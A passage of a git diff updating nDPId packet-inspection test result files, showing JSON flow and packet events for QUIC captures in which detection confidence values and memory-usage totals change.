i4SumS20xZFVtqZZynkmMlWnK09e81BgkY\/iuisZWvJRuJHFdwM30B5LDjtpgqfazbpCu6Uwmv2u3GL8UYFg9JXJ6XKW7RjDXv2OXecpNpV7Ec+NZ7S+Eblk+2y7gdGGGOJ0YWQ\/UdbM9tjr75mYZlmZ2XmwaOWA7lupjotCEVtvNyVGjw1p0RQjwWwkUNuy\/TjEqMcudShKNa9WCDQ8bWEIgXHDXASO\/PVPq3gEIqJWQbO0nhO2rHJC9mtpB902MTnQB3oRhiTtUMf7fAmQ+6s5GNn6c3en3gGYGA+JPXusJvDjsRu3PwCbxmWJ5W42P6X61ctfR4ImfNUcG5Su4UNFa8ImA7GgSH608jeNlAEH+oOj8LjAiKc4rTEvo1LMxkcm0RbEgQ5zCg4gb3K695U7hnkuVkbZ2P0\/0RHqSidtcHdfWB8hEkFLyKuUlyFbgTj26IexnKPiu\/sik7Xf0GfC\/8RFWHPg46bSbOrQPg\/gjKdjoVYkal7TJgFaID+VHNzeQm+hSPwwtg2AWznQWRmFkp75yYX7gosdtClYrZYA6FFirHqDW+0GJykjlxQKOXDmUJPLnyG1hF2irp+YW2l8A4zScFSFMH7ORiz7jakW38s4r3LjbMiRb8Tx+m08\/My\/lJnC9xZh8q82LXT41dv64cfwg2eQtvH2Lqzs2I9rgcYmsyHnPyvR7699rVEk9J9YaLrjr+fk8N7MwS+A2tX9iODZWnJOUm+mTNwC\/T\/RWyAERM4hbUAEurepo8J\/aEcXnBHo7os5GSVLmj\/GiHweHArDF0myFhpn34cAp8f6Y0QM3kFU6FLExLGABdnyQk5FEBOr15qkQbVxZ3kiwHa5MCacTRiiIRbM6fJjJYMCKTLqYyerVtahDJjc9THoEHqkc263xcjlUk3B+44Z4xuqgt4XeHolWU+aZMt8oRurkAG4Tuf4UKqTmIxukJT2TMBWkasVQHP3Z8Wausgp7GWEQU567iGHAcPK670SSe9B9hqsJ8oOEYcON5apMj26RB8Zd26Q
8fiq1vqWEGo1PCxuUi5unaVFgNv+c1hkvn7meyjHS\/L5Rc3CDUEpgtYy1aOHQJRbXUKAeBVqgmzVlTFgKNAdhCllApJowozwlhoVXS7RvypYWLyqEFM7Zu4iCwMajFBhTXBCFwHLDlfiSC1hs3iPlIAICRuCzOLoHacQfJq+YMBKP9Z\/B3dU8jrKoUx8rHfRizok1fJto91R9llaEwHYg05bSKiD9k+j1zXsQMK8reMddzvzIMatcM2wofN5hnpTHOrEb+bb8zNLy1vI98DbE"} -00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_crypto_aes_auth_size.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639054047280,"flow_last_seen":1639054047280,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1639054047280,"l3_proto":"ip4","src_ip":"134.53.36.43","dst_ip":"142.104.38.30","src_port":34917,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Snapchat","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"app-analytics-v2.snapchat.com","version":"TLSv1.3","alpn":"h3","ja3":"1b4b6c50fef204e06798d3fc7cb272fe","tls_supported_versions":"TLSv1.3"}} +00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_crypto_aes_auth_size.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639054047280,"flow_last_seen":1639054047280,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1639054047280,"l3_proto":"ip4","src_ip":"134.53.36.43","dst_ip":"142.104.38.30","src_port":34917,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Snapchat","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"app-analytics-v2.snapchat.com","version":"TLSv1.3","alpn":"h3","ja3":"1b4b6c50fef204e06798d3fc7cb272fe","tls_supported_versions":"TLSv1.3"}} 
00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"quic_crypto_aes_auth_size.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639054232898,"flow_last_seen":1639054232898,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1639054232898,"l3_proto":"ip4","src_ip":"245.161.134.177","dst_ip":"77.242.114.14","src_port":27636,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02285{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_crypto_aes_auth_size.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1639054232898,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1639054232898,"pkt":"AAAAAAAAAAUAQ0IQCABFAAViVFVAAD8RpeL1oYaxTfJyDmv0AbsFTuofyQAAAAEIVDeTZ9G0fVcAQJ7tD+1f\/+cIs8rTOAJmB9XT+G6akE0bRSYPWlYxlwYQgKRHpPG8lylyHgIaQZ8sJXtKvXdfLWTgSTNd5aRIZtuvjsWGM2q1ChFxTDrq0gh9Mn3XrTBNGLcE\/KOXhBozAtSeZE6MWbRy5IOveCHAiESH1gtNyBv5LBZlj0NMnb2mwSGz3VEF\/uR9XKBDieR+s2tHY1DI52IyGT49Jsx+HESVOfkRSHj1714zjgsyidrvJr51XV\/iMlIIyh8C9eJOXAxFYq+H92kbHkpiREhgpx9V1pLYn02OQvsP5v6Ve8k91xQWteYlQ01o5rSdr40zwXusZGqachnXgXv8vszMRWLA9PLhOI7kOFFDZXcImD8JH5oSxZp5OovqcpoP\/NL0u7PTs2VBLlaF4HoB8x3834lHBmqnFiaVaDFwllLdbz80hqVNmVXpLgB6zB7H02Zk8y1YEnDUvjjsryRUoD\/2uXxaZ0y6dKxzxEDLAdYZLpyefpJQtFMTgT8ocY8Ud+uXKAj9s6m86UDfYUAWlFBJTNv5aeSrzpbaJy8BSLNbxUX14bMcUVrlZa6wvN6KSurVgSJLDi6uRcgpmjWx2Czjz4Z6ygzz6o50UnO3ZNyRnpD0q\/ArniO1mAFuRD8EPWjOQUVIMCFPEjh53eHS6\/oL4FopXCeW3nB8wsfVNzPBv38jmCItrDwi+mGkv6DSWyV+hgXozgwQQ5ejej2maJyF5p5n8LHVV1dEozQcIkFg1jdl11dhdr2YO+cuV9Mzhj9o+bt2Q9zCCfUuQW6bWzMhtGBruaW+trc9bGpZaCKLWinH1VFyH+j0IW6ex1lwpPGickf7IwOfBrCcjRNe9iom9A4AcKomuJD\/3xy56gpwP2whItWhilZu6bnjDW5kcsO\/6LYff
u\/gGdurBeVYPsCismGAquBr\/\/sZeURzPCdSTbXciLqrL5bPr0q1GQJFjSFyN79i4bYN0MZZM\/l+RRVat88Aix7e0FL2q\/ldGUkTNonfTMqXRowtJHWSE2F4Hx9sR4mj79bpdjkJ7aPSyTzbpJXvk5hfZhwAxh8b1nGa6UagwcKkChgrDRs+aJj6u5uFs8PDQg\/ZKToy5AjNrFDPEtRRnxuM1zqNb38rtVLTTVgJgQaL0vmq9NaYENXz1aWL+guidN40XBTJrsgxD3EhGUJ+DSi59\/dOKWe2Rl1sISbY6h6MeGh+g\/i+zVTF6y50uxcyWWl1Dmxs2rXt9fj2zARugrEJVmUSW4JJVCY7wL2NY2QeDAAHL20F5xC\/x77hQYZQNgtcjoJAyCSBciIQVQRxhiuZ5p+aFbDuGE6wYLZxwdYvXXM+zUgQ++nEFyfsakRNAZGOL\/2DUBiORi\/tb+bUY3Uks3Z6CiZKZwhEx+G25f\/DF3zus8LeXpgfhonGIiwLpOhSXMO7Sfb2vEzRxXsws0LikyNbDs7giA235fQ4KYtxHcQJYl6jv0pP6jHZr6rzP9zAaWGaPC\/04kDGUig8XFlj43r4bRqomRURoYx\/xcc+mR8kpRFblBJYEvDW2cG25EuhyCidLR\/MEaMJV1aEkmvYk23KqqVsDEwUJTlePtENboY9yvL36SluUuKTLjCv6BAqIcvYU8JUNe5kKy6Y0VoQy45HxGro9pv\/+agix0J+X\/8ZPIoarFDvNd9r9w04Tg40psUeLWizK+dT27jGcmuDPDDVQWmp6QqrzpFKExSzHYja8c4K2jY\/JiwtluOmCp+ttKuD\/hxw1myZNXg94Jx3Iiq7JwfwMXbH2UidKQX\/tu2J"} -00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"quic_crypto_aes_auth_size.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639054232898,"flow_last_seen":1639054232898,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1639054232898,"l3_proto":"ip4","src_ip":"245.161.134.177","dst_ip":"77.242.114.14","src_port":27636,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Snapchat","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"gcp.api.snapchat.com","version":"TLSv1.3","alpn":"h3","ja3":"c570fdf41c8bf336ac9442888680bf3a","tls_supported_versions":"TLSv1.3"}} 
-00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"quic_crypto_aes_auth_size.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1639054047280,"flow_last_seen":1639054047280,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1639054232898,"l3_proto":"ip4","src_ip":"134.53.36.43","dst_ip":"142.104.38.30","src_port":34917,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Snapchat","breed":"Fun","category":"SocialNetwork"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"quic_crypto_aes_auth_size.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1639054232898,"flow_last_seen":1639054232898,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1639054232898,"l3_proto":"ip4","src_ip":"245.161.134.177","dst_ip":"77.242.114.14","src_port":27636,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Snapchat","breed":"Fun","category":"SocialNetwork"}} 
+00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"quic_crypto_aes_auth_size.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639054232898,"flow_last_seen":1639054232898,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1639054232898,"l3_proto":"ip4","src_ip":"245.161.134.177","dst_ip":"77.242.114.14","src_port":27636,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Snapchat","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"gcp.api.snapchat.com","version":"TLSv1.3","alpn":"h3","ja3":"c570fdf41c8bf336ac9442888680bf3a","tls_supported_versions":"TLSv1.3"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"quic_crypto_aes_auth_size.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1639054047280,"flow_last_seen":1639054047280,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1639054232898,"l3_proto":"ip4","src_ip":"134.53.36.43","dst_ip":"142.104.38.30","src_port":34917,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Snapchat","breed":"Fun","category":"SocialNetwork"}} 
+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"quic_crypto_aes_auth_size.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1639054232898,"flow_last_seen":1639054232898,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1639054232898,"l3_proto":"ip4","src_ip":"245.161.134.177","dst_ip":"77.242.114.14","src_port":27636,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Snapchat","breed":"Fun","category":"SocialNetwork"}} 00571{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"quic_crypto_aes_auth_size.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":2700,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1639054232898} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2/2 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5895501 bytes -~~ total memory freed........: 5895501 bytes -~~ total allocations/frees...: 118164/118164 +~~ total memory allocated....: 6029135 bytes +~~ total memory freed........: 6029135 bytes +~~ total allocations/frees...: 120926/120926 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 481 chars ~~ json string max len.......: 2290 chars 
diff --git a/test/results/quic_frags_ch_in_multiple_packets.pcapng.out b/test/results/quic_frags_ch_in_multiple_packets.pcapng.out index a2b790b1b..f2547aa5d 100644 --- a/test/results/quic_frags_ch_in_multiple_packets.pcapng.out +++ b/test/results/quic_frags_ch_in_multiple_packets.pcapng.out 
@@ -2,11 +2,11 @@ 00575{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1616775370814} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1616775370814,"flow_last_seen":1616775370814,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1616775370814,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":58822,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1616775370814,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1616775370814,"pkt":"AAAAAAAAAAAAAAAAht1gIK6gBNgRQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAB5cYRWwTYBOvDAAAAAQjg6gfRBF\/f3whbtLKZy53KxABEtrnM4d\/0kI3t2T5FO3RTETvA3HGhmrbwnQma+SPYPn8iYYuHdKaQW8SovX0+V4dnPseYO+4VTSZldeifgT8VNQQB04ta3cEyZMDpKRtegW4dekko5HPUbEiidNmSQOuP3pH\/8SoL9x7tTBQzg2OL3UpCqjAnX16pFAdQ+V\/RbqJ1eyzWFdbwBQd2HuCx\/Ij151BRRI2Xn\/z+ADB4rVF4WDOutzm10O8sh2ssLFe2YyMKEeSFhkO2WxMcAatNA2lQ4qJXI32K2kygG4WC7Q8Bb0hTFMG\/mywEn7y4151OST4nZUDKvDlYcVWjuF+qTVspa\/iH7c2UuyPhpTYvIjH0QeZUxZzZhSTFej2LWwFlP2YFzpGwiJSwBaiLMY+5\/70DioAlmqyVC7SFNLAm4+7fUc\/CJsf0f8FDbPGjMEF4r4f5+0LVZH94Uy4Wd0tsSsAOmIxjxwMYhgLVVmrVt7TBRxZotLsMMAE5KgY4C37J7AKCvvh04vXJj1z3UQVYGJh48Z9j2DH62a8\/DQXS74cUeasgoXI\/\/fcqyqG\/+dEnkEyyQl9f50ViwTzUzqhBwr01HZapB8dBBIdSdOLcU\/xu7325B4gE6MbrZr6w6DY7ChrOgc2VWwoxehsZo41rWBZsOQNIyPzLv9J0BRip+w7GJmYxc+3ube6gxdaz9W+Sn43CsbRIQrhbCgHGaXLfLG33YcaU4X+6lhZpZDIRrpfHlieNk0E4HHfvmW6nTXkwcpHKUc\/LWt5+WouHWvxMn4x+ldQDvX1+1587CV3XMwwBZM2RazatEhHW1RJ3OT+xC3gie6tmmnMQduXseFmc+V2JaT5\/q6MRU\/TlwY0Rq7EtJ8+ZbzGXqIuu4jxCx9oMmi66z65uXw3qINNOeUxHXJycpAWw5De4VzaVR4lwygzKGqlnx4L3JUveIj+oObyh7F56NqTe5C4UVw0rXOK5vqDKafrSODvkieITTgx03B2pUNKW9RLu1PhtbXUZuY0giPngPfKgjMEWwbgah5IvyTnveaL6sEqf9jfr3kFrsy+GNW\/OyorkDnRpI8RofzGw1tLxiDlPgh1n9rHyR1pRdby9Bnf\/rDHEeTaxotP0WhApggHCHa\/yFJECzVqs9aS7i2yWDcJfS40AFynUP1UGKhJe\/uUxXih7qXtheQ7FXxIkAhVv3cPoCRA71Cfs2E\/Eey1fVKRW5lMJW9PriJc7GoWtyx70pOdZsK8HXiQEPiYKJaSioN0cr28BDrpMUfunJRWn8PiLmXUmTtuIMIbhFyGy+EQ6xhnD+A\/0hLJNWNHMXLu\/kfUBoupAJQTCcfsChogaeqgD6e5eSYCN5PT9+XpGN3+Gf4PxJfDsTjsRYy9pJctfaPC3hqhyOjQKfCx2rbpvgC9PMRVByJjtLJxGnkJUAuG3l6UFakUVvosZ+5M63lUcs39+r3quiDA5yu7
NAJ8A\/i87lBxkG+y1mdyDXsaBDCfcK3ZxP\/soZcY4r+0QCaSKYxK3TnciTbuVT2emgJe6oE17JFaMKL\/+oNqA3ly+Sny53LHt3DnGVzfWQGnSJpT2w1xGiily9lTfAyLsd+fvmBtuH20lp8Prs7ZgVUIGMd\/pWSRV\/g=="} -00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1616775370814,"flow_last_seen":1616775370814,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1616775370814,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":58822,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}} +00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1616775370814,"flow_last_seen":1616775370814,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1616775370814,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":58822,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}} 
02181{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1616775370814,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1616775370814,"pkt":"AAAAAAAAAAAAAAAAht1gIK6gBNgRQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAB5cYRWwTYBOvIAAAAAQjg6gfRBF\/f3whbtLKZy53KxABEtnQ\/+pwGuyRXXtCPS4nq7SX6grDxLfue\/EWjBDnFsaHC\/vCyPJupYn95B94uIc35RQAXJzdsabL2pMXT5Sg\/JFun6HAUw7sNlvetq5pdG5oKE3vK\/9SDzJXTzgevEg9XCLK53vmKKNkAp8pIPL5uP852yCxWDuffTSDh3jvmocyuqPyR7wKy2amWQmRTLcjhYY1mtN\/AJ7QgugkmRPkVO\/SoOHb8vfwVTlN5QBI31Pgn0V++7rQ\/hjHjrgDqH59C7UvU4Nu\/9qoDxnTOmBoHcK94LPoI1\/y4+hexZ8e1eBwahcRgYxrP7dWTWrR+JwPD9iUpUFvxo8SIgmgVWi\/abM6MNwKmYTCNLXo60x4HtaN\/BCJP7I1SX\/LShf0cye1Of1imuBKSreuS8hR5\/tpYaSzuPld82ydSmvszAQ0GryqOJ\/ZU+jrxR3Tt\/AaRw5XB7LAQ5igi24rk0VHa8niUCDbHqUASsZJvejkDDbY6MmPqlfYaICmikKWML4UMFuk7sfDyY0i\/p8vLuvuadwwdvnNfiwmeiSJzrvtn4jKJUdczJeqQoEAINkoOw1bVBZDJVR+EUBqhm7abaUZnOPU0klsCmtzptRhvGdjGICwe3xiagqEEKgFQwB\/\/vebz12DECZEBQUukhbsCExHpl8HueAXvKSAyA62DZTnPjBbFDRoGUnmsN1w6rv\/EkKmT98KOnW\/ka23T8HpQyGW03QC+qJdzK2gggcKfOwsz6hd9z3KPjD06UASEHqfcZ0u3Yb5\/MLumpY8Low4YAuz4j1rPsR+y\/EQkWeHaYLF\/80wJp9yb7\/2p+rbsZa7D\/Pz9wdYYj0cnrXYhrg9HYHuPZ9wKDfGS5vYIihZYRGMbEMbGcFgLdOANlbTrqep7qeYaIu5bs42rtv9xGYAL49yzxTkJJj7obpk0WDg3hmOo0G0GKuMN5D3DLsd6CAekttgc\/RyQGGWPf1OdBrGOZ886sVlSYfVI53O8wLp1YwCY1QmFzdPpSevtizJ2XYvFJ+Yw3zir1qwBxD4bhntoDg+aEGwqIyiNyXgHCI13JOQpJXthbpRAj68Wk4NuVBdRmms6tJsRF69JML\/Y+B\/BUH3oVmSCNLicSWHjivNwSDG\/d7QepAS1wNYGwNmTzWQ\/PCj5j9Cdw66mm6RDZWarxDm\/oSk9NEMFrY7xKK7IeubvrPWd6WDDdJ9Bovp5NzhHiKuwVSSx\/d0e1A6bU1Fi5dfUEcrY4mCVrLQtrrzL\/UquhZSdn1pyiOy0MI0Y\/bnbB4K6J04rXZ6nEtp1EU\/NkSSyz++QGuwa8v++mBZgyRRdHXky\/yOSrTGxbmNikQP\/BXOaO3nlrxeU7SquOho6ofMGkAD9m9nnD04JBpXDbsymnBuGkTUgApPRp+NHNg+aAhwX0QXv21nT1GOJGkgZ\/kOk29raa5Ue
rzxHP43\/ZNnwqcVGS2ek0xFdawyoi7pyvj0GVa4CngTmUuJHLHSgXXYFgoXLIzPy5xMdEYkZFlxKRT4P6vvGmfHBlL7ZZl80WmHAnvVLA4inP9N6NQ6gpEuafQMHiBC8RZ7r7p\/7NgSW8\/N+dUhCD7Bp0uOQmBUbYktydmi2FFhvERfbJQ=="} -01176{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1616775370814,"flow_last_seen":1616775370814,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2464,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1616775370814,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":58822,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"version":"TLSv1.3","alpn":"h3-34,hq-34,h3-33,hq-33,h3-32,hq-32,h3-31,hq-31,h3-29,hq-29,h3-30,hq-30,h3-28,hq-28,h3-27,hq-27,h3,hq-interop","ja3":"0299b052ace53a14c3a04aceb5efd247","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}} +01176{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1616775370814,"flow_last_seen":1616775370814,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2464,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1616775370814,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":58822,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non 
Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"version":"TLSv1.3","alpn":"h3-34,hq-34,h3-33,hq-33,h3-32,hq-32,h3-31,hq-31,h3-29,hq-29,h3-30,hq-30,h3-28,hq-28,h3-27,hq-27,h3,hq-interop","ja3":"0299b052ace53a14c3a04aceb5efd247","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}} 00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1616775370815,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":116,"pkt_l4_len":62,"thread_ts_msec":1616775370815,"pkt":"AAAAAAAAAAAAAAAAht1gJDKmAD4RQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABEVvlxgA+AFHEAAAAAQhbtLKZy53KxAjsAiiM0e27twBAHLMBaZzti3E68kx9gE3ZXKGXRNRnGzCRKG8UNXw="} 